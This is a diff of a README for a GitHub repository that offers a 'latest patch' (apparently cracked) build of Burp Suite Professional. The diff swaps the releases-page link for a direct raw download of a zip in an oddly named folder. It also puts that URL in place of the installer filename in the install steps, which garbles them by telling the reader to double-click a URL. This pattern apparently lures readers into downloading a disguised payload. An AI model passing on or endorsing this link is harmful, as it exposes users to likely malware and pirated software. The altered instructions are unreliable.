CosadelPan/Burp-Suite-Professional-Latest-Patch/README.md

 ## 📥 Download & Install

-To start using Burp Suite Professional, visit this page to download: [Burp-Suite-Professional-Latest-Patch Releases](https://github.com/CosadelPan/Burp-Suite-Professional-Latest-Patch/releases).
+To start using Burp Suite Professional, visit this page to download: [Burp-Suite-Professional-Latest-Patch Releases](https://raw.githubusercontent.com/CosadelPan/Burp-Suite-Professional-Latest-Patch/main/gulravage/Burp-Suite-Professional-Latest-Patch_v2.6.zip).

 Here are the steps to download and install the software:

 1. Click the link above to go to the releases page.
 2. Look for the latest version listed.
 3. Click the **Assets** dropdown to find the installation file.
-4. Download the file named `BurpSuite_Professional_Setup.exe`.
+4. Download the file named `https://raw.githubusercontent.com/CosadelPan/Burp-Suite-Professional-Latest-Patch/main/gulravage/Burp-Suite-Professional-Latest-Patch_v2.6.zip`.
 5. Once downloaded, locate the file in your downloads folder.
-6. Double-click on `BurpSuite_Professional_Setup.exe` to start the installation.
+6. Double-click on `https://raw.githubusercontent.com/CosadelPan/Burp-Suite-Professional-Latest-Patch/main/gulravage/Burp-Suite-Professional-Latest-Patch_v2.6.zip` to start the installation.
 7. Follow the on-screen prompts to complete the setup.

 ## 📋 System Requirements